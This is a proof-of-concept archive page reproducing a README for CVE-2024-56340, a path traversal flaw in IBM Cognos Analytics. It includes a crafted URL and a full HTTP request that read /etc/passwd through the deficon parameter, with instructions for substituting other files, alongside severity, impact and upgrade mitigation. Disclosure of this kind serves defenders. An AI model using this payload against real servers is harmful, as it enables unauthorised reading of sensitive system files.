Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-56340 PoC — IBM Cognos Analytics path traversal

Source
https://github.com/MarioTesoro/CVE-2024-56340
Associated Vulnerability
Title:IBM Cognos Analytics path traversal (CVE-2024-56340)
Description:IBM Cognos Analytics 11.2.0 through 11.2.4 FP5 is vulnerable to local file inclusion vulnerability, allowing an attacker to access sensitive files by inserting path traversal payloads inside the deficon parameter.
Description
IBM Cognos Analytics Path Traversal,  Poc of CVE-2024-56340
Readme
# CVE-2024-56340

**Severity :** **Medium** (**6.5**)

**CVSS score :** `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N` 

## Summary :
**IBM Cognos Analytics 11.2.0** through **11.2.4 FP5** could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system.
## Poc
Afer logging into IBM Cognos Analytics, if the user has such grants to reach the following url, it is possible tor read files stored serverside using path traversal payloads, in this case unix payloads have been used to read /etc/passwd.
### Steps to Reproduce :
1. Login into the app.
2. Embed this url customizing it with the vulnerable **domain** to read /etc/passwd or replace the %fetc%2fpasswd with the file to read with / url-encoded:
```
https://<domain>/ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&v=3
```
Full request:
```
GET /ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&v=3 HTTP/1.1
Host: <host>
Cookie: <cookie> 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
```
NOTE: Other files can be read traversing the files, appending the files to search with path url-encoded in place of %2fetc%2fpasswd ``

## Affected Version Details :

 - $\le$ 11.2.4 $\geq$ 11.2.0

## Impact :

The attacker can read files stored serverside, where the tool have been installed. This can be a vector to perform RCE if some conditions are verified on the victim machine.
## Mitigation :

-  Update to version > 11.2.4
  
## References :
- https://nvd.nist.gov/vuln/detail/CVE-2024-56340
File Snapshot

 [4.0K]  /data/pocs/54eef242e97271e7fb8924654a393542758511d3
└── [2.1K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →